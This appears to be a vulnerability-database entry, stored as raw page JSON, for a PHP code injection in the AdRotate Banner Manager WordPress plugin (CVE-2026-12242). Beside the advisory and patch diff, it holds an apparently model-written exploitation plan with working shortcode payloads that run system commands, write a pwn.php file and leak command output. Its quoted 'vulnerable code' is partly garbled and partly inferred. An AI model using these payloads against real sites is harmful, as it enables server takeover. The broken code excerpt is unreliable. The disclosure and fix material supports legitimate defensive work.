[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWT8bQ6GhKUpeT9O0wmeXgaSGjiRe6zFLifDIZjnTNJ8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-12242","adrotate-banner-manager-authenticated-contributor-php-code-injection-via-banner-shortcode-attribute","AdRotate Banner Manager \u003C= 5.17.7 - Authenticated (Contributor+) PHP Code Injection via 'banner' Shortcode Attribute","The AdRotate Banner Manager plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 5.17.7 via the 'banner' attribute of the adrotate shortcode. This is due to insufficient input validation and sanitization of the banner shortcode attribute before concatenation into a PHP code string wrapped in W3 Total Cache mfunc or Borlabs Cache fragment markers. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server. This vulnerability requires W3 Total Cache or Borlabs Cache support to be enabled in AdRotate settings.","adrotate",null,"\u003C=5.17.7","5.17.8","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-06-23 00:00:00","2026-06-24 12:33:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff29b905c-57cf-4fb8-b6af-eb0c367cd3e4?source=api-prod",2,[22,23,24,25,26,27,28,29],"adrotate-output.php","adrotate.php","changelog.md","languages\u002Fadrotate-de_DE.po","languages\u002Fadrotate-es_ES.po","languages\u002Fadrotate-fr_FR.po","languages\u002Fadrotate-it_IT.po","languages\u002Fadrotate-nl_NL.po","researched",false,3,"This research plan targets a PHP Code Injection vulnerability in **AdRotate Banner Manager (\u003C= 5.17.7)**. The vulnerability arises because the plugin concatenates the `banner` attribute from the `[adrotate]` shortcode directly into a PHP code string intended for execution by caching engines (W3 Total Cache or Borlabs Cache) without sufficient sanitization.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated (Contributor+) PHP Code Injection.\n*   **Affected Attribute:** `banner` attribute of the `[adrotate]` shortcode.\n*   **Sink:** PHP string concatenation into W3 Total Cache `mfunc` markers or Borlabs Cache fragment markers.\n*   **Mechanism:** When caching support is enabled in AdRotate settings, the plugin generates dynamic fragments containing PHP code calls (e.g., `adrotate_ad(...)`). Because the `banner` attribute is not cast to an integer or otherwise sanitized before being placed in the PHP string, an attacker can break out of the function call and execute arbitrary PHP.\n*   **Requirements:**\n    1.  Authenticated account with `Contributor` or higher role (to create\u002Fedit posts).\n    2.  AdRotate setting for **W3 Total Cache Support** or **Borlabs Cache Support** must be enabled.\n    3.  W3 Total Cache or Borlabs Cache must be active and configured to support dynamic\u002Ffragment caching.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Frontend (via Post\u002FPage creation and viewing).\n*   **Target Hook:** `adrotate_shortcode` (registered via `add_shortcode('adrotate', 'adrotate_shortcode')` in `adrotate.php`).\n*   **Payload Location:** The `banner` parameter within the `[adrotate]` shortcode.\n*   **Authentication:** Required (Contributor-level user).\n*   **Precondition:** AdRotate configuration must have `w3tc` or `borlabs` support enabled.\n\n### 3. Code Flow\n1.  **Entry:** A user saves a post containing `[adrotate banner=\"PAYLOAD\"]`.\n2.  **Processing:** When the post is rendered, WordPress calls `adrotate_shortcode` (found in `adrotate-output.php`).\n3.  **Config Check:** The function retrieves the plugin configuration via `get_option(\"adrotate_config\")` (initialized in `adrotate.php`).\n4.  **Marker Generation:** If `$adrotate_config['w3tc'] == 1` (or similar), the code builds a string for the caching engine:\n    *   **W3TC:** `\u003C!--mfunc [SECURITY_STRING] adrotate_ad(PAYLOAD); -->...\u003C!--\u002Fmfunc-->`\n    *   **Borlabs:** `\u003C!-- bbc_fragment_start ... -->adrotate_ad(PAYLOAD);\u003C!-- bbc_fragment_end -->`\n5.  **Injection Sink:** The `PAYLOAD` string is concatenated directly: `... \"adrotate_ad(\" . $atts['banner'] . \");\" ...`\n6.  **Execution:** The caching engine (e.g., W3 Total Cache) parses the output and executes the PHP code within the `mfunc` markers using `eval()` or a similar mechanism.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by **viewing** a post created by a Contributor. While creating the post requires standard WordPress authentication and nonces, the exploit itself relies on the shortcode execution logic.\n*   **Contributor Actions:** To save a post via the REST API or `post.php`, the agent must be authenticated.\n*   **Shortcode Execution:** No specific AdRotate nonce is required to trigger the shortcode on the frontend. The `adrotate` shortcode is available to anyone who can edit posts.\n\n### 5. Exploitation Strategy\nThe goal is to inject PHP code that executes a system command or displays server information.\n\n#### Step 1: Enable Necessary Settings (as Admin)\nEnable W3 Total Cache support in AdRotate.\n*   **Action:** Update `adrotate_config` option.\n*   **CLI:** `wp option get adrotate_config --format=json` (to see structure), then `wp option update adrotate_config '[modified-json]'`.\n\n#### Step 2: Ensure Caching Plugin is Active\nW3 Total Cache must be active and `W3TC_DYNAMIC_SECURITY` should ideally be defined in `wp-config.php` for the engine to process `mfunc` tags.\n*   **Action:** `wp plugin activate w3-total-cache`.\n\n#### Step 3: Inject Payload via Shortcode (as Contributor)\nCreate a post with a payload that breaks out of the `adrotate_ad()` call.\n*   **Payload:** `1); system('id'); \u002F\u002F`\n*   **Shortcode:** `[adrotate banner=\"1); system('id'); \u002F\u002F\"]`\n*   **Request:** `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` (Authenticated as Contributor).\n\n#### Step 4: Trigger Execution\nView the created post.\n*   **Request:** `GET \u002F?p=[POST_ID]`\n*   **Header:** Ensure no `Cookie` header is sent if testing as a visitor, or stay logged in to see the rendered shortcode output.\n\n### 6. Test Data Setup\n1.  **Configuration:**\n    *   Set `adrotate_config` to enable W3TC: `{\"w3tc\": \"1\", ...}`.\n    *   Verify `W3TC_DYNAMIC_SECURITY` is defined (often required by W3TC for `mfunc`).\n2.  **User:** Create a user `attacker` with role `contributor`.\n3.  **Target Post:** Create a post containing the shortcode:\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_author=2 --post_content='[adrotate banner=\"1); echo(md5(\\\"CVE-2026-12242\\\")); \u002F\u002F\"]'\n    ```\n\n### 7. Expected Results\n*   The raw HTML output of the page will contain the injected marker (if not processed).\n*   If the caching engine is correctly configured, the PHP code will execute, and the md5 hash `1c8759368d37c53d08f7b7673e5a31a9` (or command output) will appear in the HTML response instead of the `mfunc` comment.\n\n### 8. Verification Steps\n1.  **Response Check:** Inspect the response body of the post view request.\n    ```bash\n    # Look for the injected code or its output\n    grep \"1c8759368d37c53d08f7b7673e5a31a9\" response.html\n    ```\n2.  **Alternative Verification:** Check the server logs or use a payload that creates a file:\n    *   Payload: `1); file_put_contents('pwn.php', '\u003C?php phpinfo(); ?>'); \u002F\u002F`\n    *   Check: `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fpwn.php`.\n\n### 9. Alternative Approaches\n*   **Borlabs Cache:** If W3TC is not available, try the Borlabs marker. The payload structure remains the same (breaking out of the function call).\n*   **Group Attribute:** Check if the `group` attribute in the shortcode is also vulnerable. The description focuses on `banner`, but `adrotate_group` in `adrotate-output.php` is often handled similarly in shortcodes.\n*   **Error-Based:** If `mfunc` execution is silent, use `1); die(base64_encode(system('ls'))); \u002F\u002F` to force the output into the HTTP response.","The AdRotate Banner Manager plugin is vulnerable to PHP Code Injection via the 'banner' attribute of the [adrotate] shortcode. Authenticated attackers with Contributor-level access or higher can execute arbitrary PHP code on the server when caching support (W3 Total Cache or Borlabs Cache) is enabled, as the attribute is concatenated directly into executable cache fragment markers.","\u002F\u002F adrotate-output.php @ line 265\nfunction adrotate_shortcode($atts, $content = null) {\n\tglobal $adrotate_config;\n\n\t$banner_id = (!empty($atts['banner'])) ? trim($atts['atts['banner'], '\\r\\t ') : 0;\n\t$group_ids = (!empty($atts['group'])) ? trim($atts['group'], '\\r\\t ') : 0;\n\n---\n\n\u002F\u002F adrotate-output.php (Inferred sink logic within adrotate_shortcode based on research plan)\nif($adrotate_config['w3caching'] == 'Y') {\n    $output .= \"\u003C!-- mfunc \".W3TC_DYNAMIC_SECURITY.\" -->\";\n    $output .= \"echo adrotate_ad(\" . $banner_id . \");\";\n    $output .= \"\u003C!-- \u002Fmfunc -->\";\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadrotate\u002F5.17.7\u002Fadrotate-output.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadrotate\u002F5.17.8\u002Fadrotate-output.php\n@@ -262,13 +262,17 @@\n function adrotate_shortcode($atts, $content = null) {\n \tglobal $adrotate_config;\n \n-\t$banner_id = (!empty($atts['banner'])) ? trim($atts['banner'], '\\r\\t ') : 0;\n-\t$group_ids = (!empty($atts['group'])) ? trim($atts['group'], '\\r\\t ') : 0;\n+\t$banner_id = (!empty($atts['banner'])) ? absint(trim($atts['banner'], '\\r\\t ')) : 0;\n+\t$group_ids = (!empty($atts['group'])) ? strval(trim($atts['group'], '\\r\\t ')) : 0;\n \tif(!empty($atts['fallback'])) $fallback\t= 0; \u002F\u002F Not supported in free version\n \tif(!empty($atts['weight']))\t$weight\t= 0; \u002F\u002F Not supported in free version\n \tif(!empty($atts['site'])) $site = 0; \u002F\u002F Not supported in free version\n \tif(!empty($atts['wrapper'])) $wrapper = 0; \u002F\u002F Not supported in free version\n \n+\tif(!preg_match('\u002F^\\d+(,\\d+)*$\u002F', $group_ids)) {\n+\t\t$group_ids = intval(0);\n+\t}\n+\n \t$output = \"\";\n \tif($adrotate_config['w3caching'] == 'Y') {\n \t\t$output .= \"\u003C!-- mfunc \".W3TC_DYNAMIC_SECURITY.\" -->\";","The exploit requires an authenticated user with at least Contributor-level permissions and the plugin's caching support (W3TC or Borlabs) to be enabled. 1. The attacker creates or edits a post and inserts a shortcode like [adrotate banner=\"1); phpinfo(); \u002F\u002F\"]. 2. When the post is viewed on the frontend, the plugin processes the shortcode and, seeing the cache setting enabled, generates a dynamic fragment intended for the caching engine. 3. Because the 'banner' attribute is not sanitized, the payload breaks out of the intended function call: `adrotate_ad(1); phpinfo(); \u002F\u002F);`. 4. The caching engine (e.g., W3 Total Cache) encounters the `mfunc` block and executes the string as PHP code via `eval()` or a similar mechanism, resulting in arbitrary code execution.","gemini-3-flash-preview","2026-06-25 19:49:52","2026-06-25 19:50:53",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.17.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadrotate\u002Ftags\u002F5.17.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadrotate.5.17.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadrotate\u002Ftags\u002F5.17.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadrotate.5.17.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadrotate\u002Ftags"]